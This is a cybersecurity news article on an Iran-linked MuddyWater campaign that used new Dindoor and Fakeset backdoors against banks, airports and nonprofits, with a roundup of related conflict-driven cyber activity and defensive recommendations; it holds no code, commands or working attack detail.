Iran-Linked MuddyWater Hackers Target U.S. Networks with New Dindoor Backdoor Amid Rising Tensions
scsecMarch 13, 20263 Mins read 
Security researchers have uncovered a new cyber campaign by an Iran-linked threat group targeting organizations in the United States and other regions using previously unseen malware.
Researchers from Broadcom’s Symantec and the Carbon Black Threat Hunter Team reported that the attacks have been carried out by MuddyWater, also known as Seedworm, a state-sponsored hacking group linked to Iran’s Ministry of Intelligence and Security (MOIS).
The researchers discovered that the group had gained access to networks belonging to several organizations, including banks, airports, nonprofit organizations, and the Israeli branch of a software company that supplies technology to the defense and aerospace industries.
The campaign is believed to have started in early February 2026 and was observed shortly after military strikes carried out by the United States and Israel against Iran.
New Dindoor Backdoor Discovered
Investigators found that the attacks targeting the software company, a U.S. bank, and a Canadian nonprofit were used to deploy a previously unknown backdoor called Dindoor. The malware uses the Deno JavaScript runtime to execute its malicious functions.
Researchers also detected attempts to exfiltrate data from the compromised software company using the file synchronization tool Rclone, transferring data to a Wasabi Technologies cloud storage bucket. However, it remains unclear whether the data theft attempt was successful.
Additional Backdoor Identified
In separate incidents involving a U.S. airport and a nonprofit organization, analysts discovered another backdoor called Fakeset, written in Python. The malware was downloaded from servers operated by Backblaze, a cloud storage and backup service provider.
The digital certificate used to sign the Fakeset malware has previously been associated with Stagecomp and Darkcomp, two malware families that have been linked to MuddyWater in past operations.
According to Brigid O Gorman, a senior intelligence analyst with Symantec and Carbon Black, antivirus vendors including Microsoft and Kaspersky have detected malware samples associated with Stagecomp and Darkcomp that carry signatures linked to MuddyWater.
Although those specific malware strains were not discovered in the newly targeted networks, the reuse of the same signing certificates strongly suggests that the attacks were carried out by the same threat actor.
Rising Iranian Cyber Activity
Researchers noted that Iranian threat actors have significantly improved their capabilities in recent years. Along with developing more advanced malware tools, they have become increasingly effective at social engineering techniques such as spear-phishing campaigns and honeytrap operations to gain access to sensitive accounts and information.
The discovery comes amid escalating geopolitical tensions involving Iran, the United States, and Israel. Cyber activity linked to Iran and allied groups has increased as part of the broader conflict.
Research from Check Point Software Technologies recently revealed that a pro-Palestinian hacktivist group known as Handala Hack (also called Void Manticore) has been routing operations through Starlink IP ranges while scanning internet-facing systems for vulnerabilities and weak credentials.
Meanwhile, several Iran-linked groups, including Agrius, have been observed scanning networks for vulnerable surveillance devices such as cameras produced by Hikvision and Dahua Technology. The attacks exploit known security flaws in these devices.
Security researchers believe compromised surveillance cameras could potentially be used for operational intelligence, including monitoring infrastructure and assessing damage after missile strikes.
Escalating Cyber Conflict
Amid the ongoing conflict, the Canadian Centre for Cyber Security has warned that Iran may increase cyber operations against critical infrastructure and information systems as part of retaliatory actions.
Recent reports also highlight several developments in the cyber domain:
- Israeli intelligence agencies reportedly accessed Tehran’s traffic camera network for years to track the movements of security personnel protecting senior Iranian leaders, including Ali Khamenei.
- Iran’s Islamic Revolutionary Guard Corps (IRGC) allegedly targeted an Amazon data center in Bahrain due to the company’s perceived support for Israeli military operations.
- Active destructive cyber campaigns using data-wiping malware have reportedly targeted Israeli sectors including energy, finance, government, and utilities.
- Iranian threat groups such as Charming Kitten, OilRig, Elfin, and Fox Kitten have shown signs of renewed activity as geopolitical tensions rise.
- A coordinated cyber campaign known as OpIsrael has targeted Israeli government systems and industrial infrastructure, involving groups like NoName057(16) and Cyber Islamic Resistance.
- The pro-Russian hacktivist group Z-Pentest has claimed responsibility for breaching several U.S. entities, including industrial control systems and surveillance networks.
Security experts say Iran’s cyber doctrine increasingly focuses on exploiting identity systems and cloud platforms. Instead of relying heavily on advanced zero-day vulnerabilities, Iranian operators often rely on credential theft, password spraying, and social engineering to gain initial access before establishing persistence.
Defensive Recommendations
Security experts recommend that organizations strengthen their cybersecurity defenses by improving monitoring systems, limiting internet exposure, disabling remote access to operational technology networks, and enforcing phishing-resistant multi-factor authentication.
Additional measures include network segmentation, maintaining offline backups, and ensuring that internet-facing systems such as VPN gateways and applications remain fully patched and up to date.
Experts warn that organizations in Western countries should remain on high alert, as cyber operations linked to the conflict could evolve from hacktivism into more destructive attacks targeting critical infrastructure.
1 Comment
Leave a Reply to scsec Cancel reply
Related Articles
Iran-Linked Handala Hackers Claim Massive Cyberattack on Stryker While Verifone Denies Breach
An Iran-linked hacking group known as Handala Hack Team has claimed responsibility...
Iran-Linked Dust Specter Targets Iraqi Officials with New SPLITDROP and GHOSTFORM Malware Campaign
A suspected Iran-linked threat group has been tied to a cyber-espionage campaign...
FBI Seizes LeakBase Cybercrime Forum in Global Crackdown, Securing Data of 142,000 Users
The Federal Bureau of Investigation (FBI) has taken down the cybercrime forum...
AI Agents Are the Enterprise’s Fastest-Growing Identity Risk
AI Agents and the Rise of Identity Dark Matter in the Enterprise...
This report highlights the growing sophistication of Iranian state-sponsored cyber operations. MuddyWater’s use of the new Dindoor backdoor, along with social engineering and cloud-based tools like Rclone, shows a clear focus on stealth and persistence. Organizations, especially in critical infrastructure and defense sectors, must remain vigilant, implement strong monitoring, and enforce phishing-resistant multi-factor authentication to mitigate these evolving threats.